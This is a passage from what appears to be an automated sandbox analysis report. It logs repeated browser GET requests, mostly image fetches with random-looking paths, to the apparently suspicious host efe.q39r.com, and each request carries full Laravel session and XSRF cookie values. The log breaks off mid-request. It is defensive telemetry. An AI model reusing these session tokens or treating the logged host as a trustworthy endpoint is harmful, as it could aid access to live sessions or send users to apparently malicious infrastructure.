XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvY5pc9R3aOMn5iktLy2aF80JVOqgOgAQmDmXJRh16V8fRqisgR96zZWNLppBr6uPqAnZgGMrstoDND7PTYaJrxoxbwvdXm6lbBR6k1MmdSRx33m9e4MOGfx7f0zwZleHhh4RkMIcd426 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /pqbZD8J7FTYmSxlvQoeRprDFjztNLRFVGfLqei0S3C5OKYFYXooWduvPQauK5eZhaN1ALtm8rATfqbv2GlgZzZXRCuPcYNYW3t1lvQlHMEBuEV79yz414 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IlpEaFJRTis0NEluSXpQbTRxLzcxOWc9PSIsInZhbHVlIjoid3Z6TGJjTFhJeEpTZGdndjBvdk4xdUhnbitzQmdFRlFVZU95WGdLYmREc1NucWYyN0pnb2o0ZDg1dXEySE9SWUhtbFVHWFFHTWQrMGlSazFEbi9Ld3pMVUp4MnQ4b205Tmc3VDgvdDhOOHloSmpKZ1lIaCtxZG41dnpORGlHSXEiLCJtYWMiOiIwMTg3NjQ1YzQwYjg5YzU4OTZjNmZmZjRjMDJjMWRhNjNkOWE5NTcxMzk5ZWQ4ODY3NzAyNTJhZTc5YzdmOTkyIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImpVS3l2LzBlWE5GSWNsUzd2bktlMnc9PSIsInZhbHVlIjoiTk5TWk5GYTJCczhaQ1J5TlZMZGcxVHBia3VnVnpWVmFpdG1NOGhOcXNpQ01TL05jRkxmMkt5TTJ2UmVJWGhtbUN0aVBhZlJmYzlZVTlTOWNOczR4aFdjNVNOdGJuQ2lIaDR1ZXhLVzA0c3p4QUs2eE14UHFQRWM2WEZzZWQveXkiLCJtYWMiOiJjMTJlM2M0NzRmZGU2MzM0NGQ0YzFmNmI0ZGJlMmRiNjNkMTIzNDMxOWM1YmE2M2M1ZTdlN2ZjODJiZjQ4YmUzIiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /baYfqODAqON352foJK6CCE9kK3PljnLlksxN1ximawy4Kzj8eLKti HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvNTmYhBjmYRofOqCut3dZa4UstUasUJN1P0bM12122 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /opqrVzJ7QK65jRHLycjIYeEmn3nYSEsxUcPMwlK45140 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /efVNIXESSrQw6BIj3MhA1KKgkluoFJllnuG6p4XxyrMQmt6p78145 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /pqbZD8J7FTYmSxlvQoeRprDFjztNLRFVGfLqei0S3C5OKYFYXooWduvPQauK5eZhaN1ALtm8rATfqbv2GlgZzZXRCuPcYNYW3t1lvQlHMEBuEV79yz414 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /klInHvOHos9aWrFFUZMeefGPqwxhIrivj5FxETTv56170 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /yzLzEv86HZWOuTs43gD6XgopoPEM7xE25vteTrcz90175 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /opowUdIRVvkQBTpz9zU3kvicjS7Vd758jghSE2WOx04K5tpqvy3hO3cd194 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://efe.q39r.com/3260159782465770049704iFFVMYwfZXHNULWNRTYRTUBJRAOWNOUFUOKLGSUKRBDLEVYTKDSOIHHK?384399381880252904888uIpvhsLIBURLKKWOATGJNBCEFIHVGVBRUIPDOOAHZYFXEBBOMXYRQWILAFIDEAPRQAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /uvY5pc9R3aOMn5iktLy2aF80JVOqgOgAQmDmXJRh16V8fRqisgR96zZWNLppBr6uPqAnZgGMrstoDND7PTYaJrxoxbwvdXm6lbBR6k1MmdSRx33m9e4MOGfx7f0zwZleHhh4RkMIcd426 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /opqrVzJ7QK65jRHLycjIYeEmn3nYSEsxUcPMwlK45140 HTTP/1.1Host: efe.q39r.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkxpV2l5K2FUaVUrbVM1dkRvZmFlREE9PSIsInZhbHVlIjoiMEFHS21yUGZiMFkxQTA0ODRubkdwdGk3SEFTc2o5cVBPbXo5dy9oay83R2JyZmJqR25KbUN6VFNVblNXaGNEMDFNYUdjNWw5ZkNEOEhQZEVqSzF5MTh5bmNYa0ZEMXpLOW1rRlNqTk9FRkV2MGZFbFZMVWpCSC9YSDA0Nm95YXEiLCJtYWMiOiIzNGE0ZjFiZWNmYjhkNGMxMDdmOWZkZmUxOGU4OWQwMzk5NzdhYjE2MzJiNjM3NDRjZDY2ZTk0ZjgzZTYyZjg0IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkhUY0x5UHhTTy9IRkVXSnRhZ0RlWHc9PSIsInZhbHVlIjoiVzFNR3VrSU9wTUNmUDhadXJsUzZ0TWNNWTlOQ0NSYVJUVndReHBNRlovMndtRm1JRzRrYUxINmgvcXVrSW1yTUYvWU83QnpHNWFmTENpSzRQRW1xU09nZE1VeGxXZUdBbHVMZ0ZyN3ltOHgyNmRrbmtHdktBb2lPdUlaR0tPNUIiLCJtYWMiOiIxYzk3MjhhNDQ4MGNlMjA2MzU2NjVmM2FhMzdjMjc1ZjYxM2ViMzMyMTczNjdmNWFmZGJiYzk5MTI0MThlYTQ5IiwidGFnIjoiIn0%3D
Source: global traffic HTTP traffic detected: GET /ghNptpEXYJR7LTcZ65tUkEWP4OmnFHYdEppOMq56CTaQuzPVKMBnXiF5yqRi12209 HTTP/1.1Host: efe.q39r.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 